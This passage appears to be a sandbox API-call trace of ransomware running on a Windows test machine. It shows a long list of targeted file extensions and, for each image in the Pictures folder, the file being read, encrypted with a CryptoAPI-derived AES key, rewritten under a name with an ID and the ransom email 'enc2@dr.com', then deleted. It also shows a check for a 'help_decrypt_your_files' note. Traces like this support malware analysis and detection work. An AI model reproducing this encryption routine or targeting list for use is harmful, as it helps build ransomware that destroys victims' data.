3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.171] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.172] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.172] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.177] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x14600, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x14600, lpOverlapped=0x0) returned 1
	[0196.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.181] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0196.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.185] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.185] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.186] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.186] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x14600, dwBufLen=0x14600 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x14610) returned 1
	[0196.188] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.188] RtlMoveMemory (in: Destination=0xff1788, Source=0xfdd180, Length=0x14600 | out: Destination=0xff1788) 
	[0196.188] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.188] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff1788*, pdwDataLen=0x18bc0c*=0x14600, dwBufLen=0x14610 | out: pbData=0xff1788*, pdwDataLen=0x18bc0c*=0x14610) returned 1
	[0196.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.191] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.191] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0196.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.192] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0196.192] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.192] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.193] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.194] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 93
	[0196.194] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.195] WriteFile (in: hFile=0x2c0, lpBuffer=0xff1788*, nNumberOfBytesToWrite=0x14610, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff1788*, lpNumberOfBytesWritten=0x18c068*=0x14610, lpOverlapped=0x0) returned 1
	[0196.202] CloseHandle (hObject=0x2c0) returned 1
	[0196.203] CloseHandle (hObject=0x384) returned 1
	[0196.203] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg")) returned 1
	[0196.219] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg")) returned 0
	[0196.219] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1
	[0196.219] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x338bec80, ftCreationTime.dwHighDateTime=0x1d969b7, ftLastAccessTime.dwLowDateTime=0xb2991870, ftLastAccessTime.dwHighDateTime=0x1d96be9, ftLastWriteTime.dwLowDateTime=0xb2991870, ftLastWriteTime.dwHighDateTime=0x1d96be9, nFileSizeHigh=0x0, nFileSizeLow=0xd239, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vy9X-MC7WsgCkhxyX.png", cAlternateFileName="VY9X-M~1.PNG")) returned 1
	[0196.219] lstrcmpW (lpString1="vy9X-MC7WsgCkhxyX.png", lpString2="..") returned 1
	[0196.220] lstrcmpW (lpString1="vy9X-MC7WsgCkhxyX.png", lpString2=".") returned 1
	[0196.220] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.220] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="vy9X-MC7WsgCkhxyX.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\vy9X-MC7WsgCkhxyX.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\vy9X-MC7WsgCkhxyX.png"
	[0196.220] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\vy9X-MC7WsgCkhxyX.png") returned 52
	[0196.220] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.220] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\vy9X-MC7WsgCkhxyX.png", cchLength=0x34 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png") returned 0x34
	[0196.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.221] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.221] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png"
	[0196.221] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png") returned 52
	[0196.221] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.222] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0196.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.222] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.222] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.223] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.223] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vy9x-mc7wsgckhxyx.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.227] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xd239, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xd239, lpOverlapped=0x0) returned 1
	[0196.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.239] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcaef0) returned 1
	[0196.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.242] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.242] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.242] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.242] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xd239, dwBufLen=0xd239 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xd240) returned 1
	[0196.245] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.245] RtlMoveMemory (in: Destination=0xfea3c8, Source=0xfdd180, Length=0xd239 | out: Destination=0xfea3c8) 
	[0196.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
